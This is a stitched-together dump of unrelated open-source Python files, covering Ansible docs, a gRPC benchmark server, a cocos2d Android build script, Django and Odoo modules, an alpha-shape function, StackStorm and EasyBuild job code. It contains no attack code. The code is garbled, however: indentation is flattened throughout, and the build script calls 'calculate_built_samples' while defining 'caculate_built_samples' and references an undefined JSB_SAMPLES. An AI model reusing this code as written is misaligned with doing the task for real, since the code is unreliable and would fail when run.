device over the specified transport. The value of host is used as
the destination address for the transport.
type: str
required: true
port:
description:
          - Specifies the port to use when building the connection to the remote
device.
type: int
default: 22
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
type: str
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
type: str
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
type: int
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This value is the path to the
key used to authenticate the SSH session. If the value is not specified
in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
will be used instead.
type: path
'''
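    # Editor's illustrative note, not part of the official fragment: modules that
    # share this fragment (for example aruba_command) accept the provider options
    # documented above roughly like this in a play; the variable names below are
    # assumed examples.
    #
    #   - aruba_command:
    #       commands: show version
    #       provider:
    #         host: "{{ inventory_hostname }}"
    #         username: admin
    #         password: "{{ vault_aruba_password }}"
    #         timeout: 30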
|
royalharsh/grpc | refs/heads/master | src/python/grpcio_tests/tests/qps/benchmark_server.py | 23 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
class BenchmarkServer(services_pb2.BenchmarkServiceServicer):
"""Synchronous Server implementation for the Benchmark service."""
def UnaryCall(self, request, context):
payload = messages_pb2.Payload(body='\0' * request.response_size)
return messages_pb2.SimpleResponse(payload=payload)
def StreamingCall(self, request_iterator, context):
for request in request_iterator:
payload = messages_pb2.Payload(body='\0' * request.response_size)
yield messages_pb2.SimpleResponse(payload=payload)
class GenericBenchmarkServer(services_pb2.BenchmarkServiceServicer):
"""Generic Server implementation for the Benchmark service."""
def __init__(self, resp_size):
self._response = '\0' * resp_size
def UnaryCall(self, request, context):
return self._response
def StreamingCall(self, request_iterator, context):
for request in request_iterator:
yield self._response
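def _serve_benchmark_sketch(address='[::]:0', max_workers=8):
    """Editor's illustrative sketch, not part of the original module.
    Assumes the generated services_pb2 module exposes the conventional
    add_BenchmarkServiceServicer_to_server helper for this service.
    """
    from concurrent import futures
    import grpc
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
    services_pb2.add_BenchmarkServiceServicer_to_server(BenchmarkServer(), server)
    bound_port = server.add_insecure_port(address)
    server.start()
    return server, bound_port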
|
cocos2d/cocos2d-x-samples | refs/heads/v3 | samples/SwiftTetris/cocos2d/plugin/tools/android-build.py | 240 | #!/usr/bin/python
# android-build.py
# Build android samples
import sys
import os, os.path
import shutil
from optparse import OptionParser
CPP_SAMPLES = ["HelloPlugins"]
ALL_SAMPLES = CPP_SAMPLES
def check_environment_variables():
    ''' Check that the environment variable NDK_ROOT, which will be used for building, is defined
'''
try:
NDK_ROOT = os.environ['NDK_ROOT']
except Exception:
print "NDK_ROOT not defined. Please define NDK_ROOT in your environment"
sys.exit(1)
return NDK_ROOT
def select_toolchain_version():
    '''Because ndk-r8e uses gcc4.6 by default and gcc4.6 doesn't support c++11, we should select gcc4.7 when
    using ndk-r8e. But gcc4.7 is removed in ndk-r9, so we have to check which toolchain version actually exists.
    Conclusion:
ndk-r8e -> use gcc4.7
ndk-r9 -> use gcc4.8
'''
ndk_root = check_environment_variables()
if os.path.isdir(os.path.join(ndk_root,"toolchains/arm-linux-androideabi-4.8")):
os.environ['NDK_TOOLCHAIN_VERSION'] = '4.8'
print "The Selected NDK toolchain version was 4.8 !"
elif os.path.isdir(os.path.join(ndk_root,"toolchains/arm-linux-androideabi-4.7")):
os.environ['NDK_TOOLCHAIN_VERSION'] = '4.7'
print "The Selected NDK toolchain version was 4.7 !"
else:
print "Couldn't find the gcc toolchain."
exit(1)
def caculate_built_samples(args):
    ''' Compute the samples to be built
    'cpp' is shorthand for all C++ samples
    'jsb' is shorthand for all JavaScript samples
'''
if 'all' in args:
return ALL_SAMPLES
if 'jsb' in args:
return JSB_SAMPLES
if 'cpp' in args:
return CPP_SAMPLES
targets = []
targets += args
# remove duplicate elements, for example
# python android-build.py cpp hellocpp
targets = set(targets)
return list(targets)
def do_build(plugin_root, cocos_root, ndk_root, app_android_root, ndk_build_param):
ndk_path = os.path.join(ndk_root, "ndk-build")
# windows should use ";" to seperate module paths
platform = sys.platform
if platform == 'win32':
ndk_module_path = 'NDK_MODULE_PATH=%s/publish;%s;%s/external;%s/cocos' % (plugin_root, cocos_root, cocos_root, cocos_root)
else:
ndk_module_path = 'NDK_MODULE_PATH=%s/publish:%s:%s/external:%s/cocos' % (plugin_root, cocos_root, cocos_root, cocos_root)
if ndk_build_param == None:
command = '%s -C %s %s' % (ndk_path, app_android_root, ndk_module_path)
else:
command = '%s -C %s %s %s' % (ndk_path, app_android_root, ndk_build_param, ndk_module_path)
os.system(command)
def copy_files(src, dst):
for item in os.listdir(src):
path = os.path.join(src, item)
        # Android cannot package files that end with ".gz"
if not item.startswith('.') and not item.endswith('.gz') and os.path.isfile(path):
shutil.copy(path, dst)
if os.path.isdir(path):
new_dst = os.path.join(dst, item)
if not os.path.exists(new_dst):
os.mkdir(new_dst)
copy_files(path, new_dst)
def copy_resources(target, app_android_root, plugin_root):
# remove app_android_root/assets if it exists
assets_dir = os.path.join(app_android_root, "assets")
if os.path.isdir(assets_dir):
shutil.rmtree(assets_dir)
# copy resources(cpp samples and lua samples)
os.mkdir(assets_dir)
resources_dir = os.path.join(app_android_root, "../Resources")
if os.path.isdir(resources_dir):
copy_files(resources_dir, assets_dir)
# jsb samples should copy javascript files and resources(shared with cocos2d-html5)
# if target in JSB_SAMPLES:
# resources_dir = os.path.join(app_android_root, "../../../../cocos/scripting/javascript/script")
# copy_files(resources_dir, assets_dir)
# resources_dir = os.path.join(plugin_root, "jsbindings/js")
# copy_files(resources_dir, assets_dir)
# copy plugin resources to the assets
plugins_dir = os.path.join(plugin_root, "publish" + os.path.sep + "plugins")
for item in os.listdir(plugins_dir):
src = os.path.join(plugins_dir, item + os.path.sep + "android" + os.path.sep + "ForAssets")
if os.path.isdir(src):
copy_files(src, assets_dir)
def copy_clibs(app_android_root, plugin_root):
target_cpath = os.path.join(app_android_root, "libs")
plugins_dir = os.path.join(plugin_root, "publish" + os.path.sep + "plugins")
for item in os.listdir(plugins_dir):
src = os.path.join(plugins_dir, item + os.path.sep + "android" + os.path.sep + "CLibs")
if os.path.isdir(src):
if not os.path.exists(target_cpath):
os.mkdir(target_cpath)
copy_files(src, target_cpath)
def build_samples(target,ndk_build_param):
ndk_root = check_environment_variables()
select_toolchain_version()
    build_targets = calculate_built_samples(target)
current_dir = os.path.dirname(os.path.realpath(__file__))
cocos_root = os.path.join(current_dir, "../../")
plugin_root = os.path.join(current_dir, "..")
app_android_root = ''
for target in build_targets:
app_android_root = os.path.join(plugin_root, "samples" + os.path.sep + target + os.path.sep + "proj.android")
copy_resources(target, app_android_root, plugin_root)
do_build(plugin_root, cocos_root, ndk_root, app_android_root, ndk_build_param)
copy_clibs(app_android_root, plugin_root)
# -------------- main --------------
if __name__ == '__main__':
usage = "usage: %prog all"
#parse the params
parser = OptionParser(usage=usage)
parser.add_option("-n", "--ndk", dest="ndk_build_param",
help='parameter for ndk-build')
(opts, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
else:
build_samples(args, opts.ndk_build_param)
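# Example invocations (illustrative only; they assume NDK_ROOT is exported and
# that the sample projects exist under plugin/samples/):
#   python android-build.py all
#   python android-build.py cpp
#   python android-build.py --ndk=NDK_DEBUG=1 HelloPlugins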
|
softak/webfaction_demo | refs/heads/master | vendor-local/lib/python/django/contrib/localflavor/sk/sk_districts.py | 543 | """
Slovak districts according to http://sk.wikipedia.org/wiki/Administrat%C3%ADvne_%C4%8Dlenenie_Slovenska
"""
from django.utils.translation import ugettext_lazy as _
DISTRICT_CHOICES = (
('BB', _('Banska Bystrica')),
('BS', _('Banska Stiavnica')),
('BJ', _('Bardejov')),
('BN', _('Banovce nad Bebravou')),
('BR', _('Brezno')),
('BA1', _('Bratislava I')),
('BA2', _('Bratislava II')),
('BA3', _('Bratislava III')),
('BA4', _('Bratislava IV')),
('BA5', _('Bratislava V')),
('BY', _('Bytca')),
('CA', _('Cadca')),
('DT', _('Detva')),
('DK', _('Dolny Kubin')),
('DS', _('Dunajska Streda')),
('GA', _('Galanta')),
('GL', _('Gelnica')),
('HC', _('Hlohovec')),
('HE', _('Humenne')),
('IL', _('Ilava')),
('KK', _('Kezmarok')),
('KN', _('Komarno')),
('KE1', _('Kosice I')),
('KE2', _('Kosice II')),
('KE3', _('Kosice III')),
('KE4', _('Kosice IV')),
('KEO', _('Kosice - okolie')),
('KA', _('Krupina')),
('KM', _('Kysucke Nove Mesto')),
('LV', _('Levice')),
('LE', _('Levoca')),
('LM', _('Liptovsky Mikulas')),
('LC', _('Lucenec')),
('MA', _('Malacky')),
('MT', _('Martin')),
('ML', _('Medzilaborce')),
('MI', _('Michalovce')),
('MY', _('Myjava')),
('NO', _('Namestovo')),
('NR', _('Nitra')),
('NM', _('Nove Mesto nad Vahom')),
('NZ', _('Nove Zamky')),
('PE', _('Partizanske')),
('PK', _('Pezinok')),
('PN', _('Piestany')),
('PT', _('Poltar')),
('PP', _('Poprad')),
('PB', _('Povazska Bystrica')),
('PO', _('Presov')),
('PD', _('Prievidza')),
('PU', _('Puchov')),
('RA', _('Revuca')),
('RS', _('Rimavska Sobota')),
('RV', _('Roznava')),
('RK', _('Ruzomberok')),
('SB', _('Sabinov')),
('SC', _('Senec')),
('SE', _('Senica')),
('SI', _('Skalica')),
('SV', _('Snina')),
('SO', _('Sobrance')),
('SN', _('Spisska Nova Ves')),
('SL', _('Stara Lubovna')),
('SP', _('Stropkov')),
('SK', _('Svidnik')),
('SA', _('Sala')),
('TO', _('Topolcany')),
('TV', _('Trebisov')),
('TN', _('Trencin')),
('TT', _('Trnava')),
('TR', _('Turcianske Teplice')),
('TS', _('Tvrdosin')),
('VK', _('Velky Krtis')),
('VT', _('Vranov nad Toplou')),
('ZM', _('Zlate Moravce')),
('ZV', _('Zvolen')),
('ZC', _('Zarnovica')),
('ZH', _('Ziar nad Hronom')),
('ZA', _('Zilina')),
)
|
lepture/pythondotorg | refs/heads/master | downloads/models.py | 6 | from django.core.urlresolvers import reverse
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template.loader import render_to_string
from django.utils import timezone
from markupfield.fields import MarkupField
from boxes.models import Box
from cms.models import ContentManageable, NameSlugModel
from fastly.utils import purge_url
from pages.models import Page
from .managers import ReleaseManager
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class OS(ContentManageable, NameSlugModel):
""" OS for Python release """
class Meta:
verbose_name = 'Operating System'
verbose_name_plural = 'Operating Systems'
ordering = ('name', )
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('download:download_os_list', kwargs={'os_slug': self.slug})
class Release(ContentManageable, NameSlugModel):
"""
    A particular version release. The name field should be the version number,
    for example: 3.3.4 or 2.7.6
"""
PYTHON1 = 1
PYTHON2 = 2
PYTHON3 = 3
PYTHON_VERSION_CHOICES = (
(PYTHON3, 'Python 3.x.x'),
(PYTHON2, 'Python 2.x.x'),
(PYTHON1, 'Python 1.x.x'),
)
version = models.IntegerField(default=PYTHON3, choices=PYTHON_VERSION_CHOICES)
is_latest = models.BooleanField(
verbose_name='Is this the latest release?',
default=False,
db_index=True,
help_text="Set this if this should be considered the latest release "
"for the major version. Previous 'latest' versions will "
"automatically have this flag turned off.",
)
is_published = models.BooleanField(
verbose_name='Is Published?',
default=False,
db_index=True,
help_text="Whether or not this should be considered a released/published version",
)
pre_release = models.BooleanField(
verbose_name='Pre-release',
default=False,
db_index=True,
help_text="Boolean to denote pre-release/beta/RC versions",
)
show_on_download_page = models.BooleanField(
default=True,
db_index=True,
help_text="Whether or not to show this release on the main /downloads/ page",
)
release_date = models.DateTimeField(default=timezone.now)
release_page = models.ForeignKey(Page, related_name='release', blank=True, null=True)
release_notes_url = models.URLField('Release Notes URL', blank=True)
content = MarkupField(default_markup_type=DEFAULT_MARKUP_TYPE, default='')
objects = ReleaseManager()
class Meta:
verbose_name = 'Release'
verbose_name_plural = 'Releases'
ordering = ('name', )
get_latest_by = 'release_date'
def __str__(self):
return self.name
def get_absolute_url(self):
if not self.content.raw and self.release_page:
return self.release_page.get_absolute_url()
else:
return reverse('download:download_release_detail', kwargs={'release_slug': self.slug})
def download_file_for_os(self, os_slug):
""" Given an OS slug return the appropriate download file """
try:
file = self.files.get(os__slug=os_slug, download_button=True)
except ReleaseFile.DoesNotExist:
file = None
return file
def files_for_os(self, os_slug):
""" Return all files for this release for a given OS """
files = self.files.filter(os__slug=os_slug).order_by('-name')
return files
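    # Illustrative use (the 'windows' slug is an assumption based on the purge
    # list further down; 'source' is used by update_supernav below):
    #   release.download_file_for_os('windows')  # -> ReleaseFile or None
    #   release.files_for_os('source')           # -> queryset of ReleaseFiles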
def update_supernav():
try:
latest_python2 = Release.objects.latest_python2()
except Release.DoesNotExist:
latest_python2 = None
try:
latest_python3 = Release.objects.latest_python3()
except Release.DoesNotExist:
latest_python3 = None
python_files = []
for o in OS.objects.all():
data = {
'os': o,
'python2': None,
'python3': None,
}
if latest_python2:
data['python2'] = latest_python2.download_file_for_os(o.slug)
if latest_python3:
data['python3'] = latest_python3.download_file_for_os(o.slug)
python_files.append(data)
content = render_to_string('downloads/supernav.html', {
'latest_python2': latest_python2,
'latest_python3': latest_python3,
'python_files': python_files,
})
box = Box.objects.get(label='supernav-python-downloads')
box.content = content
box.save()
# Update latest Sources box on Download landing page
if latest_python2:
latest_python2_source = latest_python2.download_file_for_os('source')
else:
latest_python2_source = None
if latest_python3:
latest_python3_source = latest_python3.download_file_for_os('source')
else:
latest_python3_source = None
source_box = Box.objects.get(label='download-sources')
source_content = render_to_string('downloads/download-sources-box.html', {
'latest_python2_source': latest_python2_source,
'latest_python3_source': latest_python3_source,
})
source_box.content = source_content
source_box.save()
def update_homepage_download_box():
try:
latest_python2 = Release.objects.latest_python2()
except Release.DoesNotExist:
latest_python2 = None
try:
latest_python3 = Release.objects.latest_python3()
except Release.DoesNotExist:
latest_python3 = None
content = render_to_string('downloads/homepage-downloads-box.html', {
'latest_python2': latest_python2,
'latest_python3': latest_python3,
})
box = Box.objects.get(label='homepage-downloads')
box.content = content
box.save()
@receiver(post_save, sender=Release)
def promote_latest_release(sender, instance, **kwargs):
""" Promote this release to be the latest if this flag is set """
# Skip in fixtures
if kwargs.get('raw', False):
return
if instance.is_latest:
# Demote all previous instances
Release.objects.filter(
version=instance.version
).exclude(
pk=instance.pk
).update(is_latest=False)
@receiver(post_save, sender=Release)
def purge_fastly_download_pages(sender, instance, **kwargs):
"""
Purge Fastly caches so new Downloads show up more quickly
"""
# Don't purge on fixture loads
if kwargs.get('raw', False):
return
# Only purge on published instances
if instance.is_published:
# Purge our common pages
purge_url('/downloads/')
purge_url('/downloads/latest/python2/')
purge_url('/downloads/latest/python3/')
purge_url('/downloads/mac-osx/')
purge_url('/downloads/source/')
purge_url('/downloads/windows/')
# Purge the release page itself
purge_url(instance.get_absolute_url())
@receiver(post_save, sender=Release)
def update_download_supernav(sender, instance, **kwargs):
""" Update download supernav """
# Skip in fixtures
if kwargs.get('raw', False):
return
if instance.is_published:
update_supernav()
update_homepage_download_box()
class ReleaseFile(ContentManageable, NameSlugModel):
"""
    Individual files in a release. If a specific OS/release combo has multiple
    versions (for example, Windows and Mac OS X 32- vs 64-bit builds), each file
    needs to be added separately
"""
os = models.ForeignKey(OS, related_name="releases", verbose_name='OS')
release = models.ForeignKey(Release, related_name="files")
description = models.TextField(blank=True)
is_source = models.BooleanField('Is Source Distribution', default=False)
url = models.URLField('URL', unique=True, db_index=True, help_text="Download URL")
gpg_signature_file = models.URLField(
'GPG SIG URL',
blank=True,
help_text="GPG Signature URL"
)
md5_sum = models.CharField('MD5 Sum', max_length=200, blank=True)
filesize = models.IntegerField(default=0)
download_button = models.BooleanField(default=False, help_text="Use for the supernav download button for this OS")
class Meta:
verbose_name = 'Release File'
verbose_name_plural = 'Release Files'
ordering = ('-release__is_published', 'release__name', 'os__name', 'name')
|
mdiener21/python-geospatial-analysis-cookbook | refs/heads/master | ch08/code/alpha_shape.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############
#
# Code source modified from
# http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/
#
###############
from shapely import geometry
from shapely.ops import cascaded_union, polygonize
from scipy.spatial import Delaunay
import numpy as np
import math
def alpha_shape(points, alpha):
"""
Compute the alpha shape (concave hull) of a set
of points.
@param points: Iterable container of points.
@param alpha: alpha value to influence the
gooeyness of the border. Smaller numbers
don't fall inward as much as larger numbers.
Too large, and you lose everything!
"""
if len(points) < 4:
        # With fewer than four points the triangulation is degenerate,
        # so just return the convex hull.
return geometry.MultiPoint(list(points)).convex_hull
def add_edge(edges, edge_points, coords, i, j):
"""
Add a line between the i-th and j-th points,
if not in the list already
"""
if (i, j) in edges or (j, i) in edges:
# already added
return
edges.add((i, j))
edge_points.append(coords[[i, j]])
coords = np.array([point.coords[0] for point in points])
tri = Delaunay(coords)
edges = set()
edge_points = []
# loop over triangles:
# ia, ib, ic = indices of corner points of the
# triangle
for ia, ib, ic in tri.vertices:
pa = coords[ia]
pb = coords[ib]
pc = coords[ic]
# Lengths of sides of triangle
a = math.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)
b = math.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)
c = math.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)
# Semiperimeter of triangle
s = (a + b + c) / 2.0
# Area of triangle by Heron's formula
        area = math.sqrt(s * (s - a) * (s - b) * (s - c))
        # Skip degenerate (collinear) triangles, which would otherwise
        # cause a division by zero just below
        if area == 0:
            continue
        circum_r = a * b * c / (4.0 * area)
# Here's the radius filter.
# print circum_r
if circum_r < 1.0 / alpha:
add_edge(edges, edge_points, coords, ia, ib)
add_edge(edges, edge_points, coords, ib, ic)
add_edge(edges, edge_points, coords, ic, ia)
m = geometry.MultiLineString(edge_points)
triangles = list(polygonize(m))
return cascaded_union(triangles), edge_points
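# Minimal usage sketch (not part of the original recipe): build a small random
# point set and extract its concave hull. shapely, numpy and scipy are assumed
# to be installed (they are imported above); alpha=0.4 is an arbitrary value
# chosen for illustration and may need tuning for real data.
if __name__ == '__main__':
    np.random.seed(42)
    sample_points = [geometry.Point(x, y) for x, y in np.random.rand(40, 2) * 10]
    concave_hull, edge_points = alpha_shape(sample_points, alpha=0.4)
    print(concave_hull.wkt)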
|
singingwolfboy/invoke | refs/heads/master | tests/_support/simple_ns_list.py | 5 | from invoke import task, Collection
@task
def z_toplevel():
pass
@task
def subtask():
pass
ns = Collection(z_toplevel, Collection('a', Collection('b', subtask)))
|
gurneyalex/odoo | refs/heads/13.0-improve_sale_coupon_perf | addons/website_event_sale/__init__.py | 1315 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import controllers
from . import models
|
safwanrahman/linuxdesh | refs/heads/master | kitsune/sumo/tests/test_tests.py | 23 | """Tests for the TestCase base class and any other utils that come along."""
from django.core.cache import cache
from nose.tools import eq_
from kitsune.sumo.tests import TestCase
CACHE_KEY = 'sumo_cache_flushing_test'
class CacheFlushingTests(TestCase):
"""Tests that make sure SUMO's base TestCase flushes memcached.
This whole class comprises one conceptual test in two parts, which must
run in the listed order.
"""
def test_1_store(self):
"""Store a value in the cache."""
cache.set(CACHE_KEY, 'smoo')
def test_2_assert(self):
"""Assert the value stored above isn't there."""
eq_(None, cache.get(CACHE_KEY))
|
sakisbl/OpenSesameOnline | refs/heads/master | webapp/os_online/experimenter/managers.py | 1 | # -*- coding: ascii -*-
"""
#==============================================================================
#title :view.py
#description :This module implements managers for the Experiment Tokens.
ActiveTokenManager will fetch the tokens that are not yet
invalidated. (But not the permalink)
ExpiredTokenManager will fetch the expired tokens
#author :OpenSesame group of GipHouse 2014, Radboud University
#date :2014-06-16
#version :0.2
#notes :
#python_version :2.7
#python_version :1.6
#==============================================================================
"""
from django.db.models import Manager, Q
#pylint: disable=too-many-public-methods
class ActiveTokenManager(Manager):
""" Manager for active tokens (not expired).
"""
def get_queryset(self):
""" Gets the set of active tokens (excludes the permalink)"""
queryset = super(ActiveTokenManager, self).get_queryset()
return queryset.filter(Q(used=False), Q(perma_token=False))
class ExpiredTokenManager(Manager):
""" Manager for expired tokens.
"""
def get_queryset(self):
""" Gets the set of expired tokens"""
queryset = super(ExpiredTokenManager, self).get_queryset()
return queryset.filter(Q(used=True))
|
tonybaloney/st2contrib | refs/heads/master | packs/orion/actions/start_discovery.py | 3 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lib.actions import OrionBaseAction
from lib.utils import send_user_error, only_one
class StartDiscovery(OrionBaseAction):
def run(self,
name,
poller,
snmp_communities,
nodes=None,
subnets=None,
ip_ranges=None,
no_icmp_only=True,
auto_import=False):
"""
Create and Start Discovery process in Orion.
Returns:
- ProfileID that was created (or error from Orion).
"""
results = {}
        # Orion requires the unused variables to be set to specific values.
BulkList = None
IpRanges = []
Subnets = None
results['label'] = self.connect()
if not only_one(nodes, subnets, ip_ranges):
msg = "Need only one out of nodes, ip_ranges or subnets!"
send_user_error(msg)
raise ValueError(msg)
if nodes is not None:
BulkList = []
for node in nodes:
BulkList.append({'Address': node})
elif ip_ranges is not None:
for ip_range in ip_ranges:
(start_ip, end_ip) = ip_range.split(':')
IpRanges.append({'StartAddress': start_ip,
'EndAddress': end_ip})
elif subnets is not None:
Subnets = []
for subnet in subnets:
(SubnetIP, SubnetMask) = subnet.split('/')
Subnets.append({'SubnetIP': SubnetIP,
'SubnetMask': SubnetMask})
CredID_order = 1
CredIDs = []
for snmp in snmp_communities:
CredIDs.append(
{'CredentialID': self.get_snmp_cred_id(snmp),
'Order': CredID_order}
)
CredID_order += 1
CorePluginConfiguration = self.invoke('Orion.Discovery',
'CreateCorePluginConfiguration',
{'BulkList': BulkList,
'IpRanges': IpRanges,
'Subnets': Subnets,
'Credentials': CredIDs,
'WmiRetriesCount': 0,
'WmiRetryIntervalMiliseconds':
1000})
        # If no poller is given, default the engine ID to the primary poller (aka 1).
if poller is not None:
engineID = self.get_engine_id(poller)
else:
engineID = 1
self.logger.info(
"Adding '{}' Discovery profile to Orion: {}".format(
name, results['label']))
disco = self.invoke('Orion.Discovery', 'StartDiscovery',
{
'Name': name,
'EngineId': engineID,
'JobTimeoutSeconds': 3600,
'SearchTimeoutMiliseconds': 2000,
'SnmpTimeoutMiliseconds': 2000,
'SnmpRetries': 4,
'RepeatIntervalMiliseconds': 1800,
'SnmpPort': 161,
'HopCount': 0,
'PreferredSnmpVersion': 'SNMP2c',
'DisableIcmp': no_icmp_only,
'AllowDuplicateNodes': False,
'IsAutoImport': auto_import,
'IsHidden': False,
'PluginConfigurations': [
{'PluginConfigurationItem':
CorePluginConfiguration}
]
})
# FIX ME Check job created....
return disco
|
Caylo/easybuild-framework | refs/heads/master | easybuild/tools/job/pbs_python.py | 2 | ##
# Copyright 2012-2016 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Interface module to TORQUE (PBS).
:author: Stijn De Weirdt (Ghent University)
:author: Toon Willems (Ghent University)
:author: Kenneth Hoste (Ghent University)
"""
from distutils.version import LooseVersion
import os
import re
import tempfile
from vsc.utils import fancylogger
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.config import build_option
from easybuild.tools.job.backend import JobBackend
from easybuild.tools.utilities import only_if_module_is_available
_log = fancylogger.getLogger('pbs_python', fname=False)
# the 'extend' parameter should be 'NULL' in some functions because this is required by the python api
NULL = 'NULL'
# list of known hold types
KNOWN_HOLD_TYPES = []
try:
import pbs
from PBSQuery import PBSQuery
KNOWN_HOLD_TYPES = [pbs.USER_HOLD, pbs.OTHER_HOLD, pbs.SYSTEM_HOLD]
except ImportError as err:
_log.debug("Failed to import pbs/PBSQuery from pbs_python."
" Silently ignoring, this is a real issue only when pbs_python is used as backend for --job")
class PbsPython(JobBackend):
"""
Manage PBS server communication and create `PbsJob` objects.
"""
# pbs_python 4.1.0 introduces the pbs.version variable we rely on
REQ_VERSION = '4.1.0'
# _check_version is called by __init__, so guard it (too) with the decorator
@only_if_module_is_available('pbs', pkgname='pbs_python')
def _check_version(self):
"""Check whether pbs_python version complies with required version."""
version_regex = re.compile('pbs_python version (?P<version>.*)')
res = version_regex.search(pbs.version)
if res:
version = res.group('version')
if LooseVersion(version) < LooseVersion(self.REQ_VERSION):
raise EasyBuildError("Found pbs_python version %s, but version %s or more recent is required",
version, self.REQ_VERSION)
else:
raise EasyBuildError("Failed to parse pbs_python version string '%s' using pattern %s",
pbs.version, version_regex.pattern)
def __init__(self, *args, **kwargs):
"""Constructor."""
pbs_server = kwargs.pop('pbs_server', None)
super(PbsPython, self).__init__(*args, **kwargs)
self.pbs_server = pbs_server or build_option('job_target_resource') or pbs.pbs_default()
self.conn = None
self._ppn = None
def init(self):
"""
Initialise the job backend.
Connect to the PBS server & reset list of submitted jobs.
"""
self.connect_to_server()
self._submitted = []
def connect_to_server(self):
"""Connect to PBS server, set and return connection."""
if not self.conn:
self.conn = pbs.pbs_connect(self.pbs_server)
return self.conn
def queue(self, job, dependencies=frozenset()):
"""
Add a job to the queue.
:param dependencies: jobs on which this job depends.
"""
if dependencies:
job.add_dependencies(dependencies)
job._submit()
self._submitted.append(job)
def complete(self):
"""
Complete a bulk job submission.
Release all user holds on submitted jobs, and disconnect from server.
"""
for job in self._submitted:
if job.has_holds():
self.log.info("releasing user hold on job %s" % job.jobid)
job.release_hold()
self.disconnect_from_server()
# print list of submitted jobs
submitted_jobs = '; '.join(["%s (%s): %s" % (job.name, job.module, job.jobid) for job in self._submitted])
print_msg("List of submitted jobs (%d): %s" % (len(self._submitted), submitted_jobs), log=self.log)
# determine leaf nodes in dependency graph, and report them
all_deps = set()
for job in self._submitted:
all_deps = all_deps.union(job.deps)
leaf_nodes = []
for job in self._submitted:
if job.jobid not in all_deps:
leaf_nodes.append(str(job.jobid).split('.')[0])
self.log.info("Job ids of leaf nodes in dep. graph: %s" % ','.join(leaf_nodes))
def disconnect_from_server(self):
"""Disconnect current connection."""
pbs.pbs_disconnect(self.conn)
self.conn = None
def _get_ppn(self):
"""Guess PBS' `ppn` value for a full node."""
# cache this value as it's not likely going to change over the
# `eb` script runtime ...
if not self._ppn:
pq = PBSQuery()
node_vals = pq.getnodes().values() # only the values, not the names
interesting_nodes = ('free', 'job-exclusive',)
res = {}
for np in [int(x['np'][0]) for x in node_vals if x['state'][0] in interesting_nodes]:
res.setdefault(np, 0)
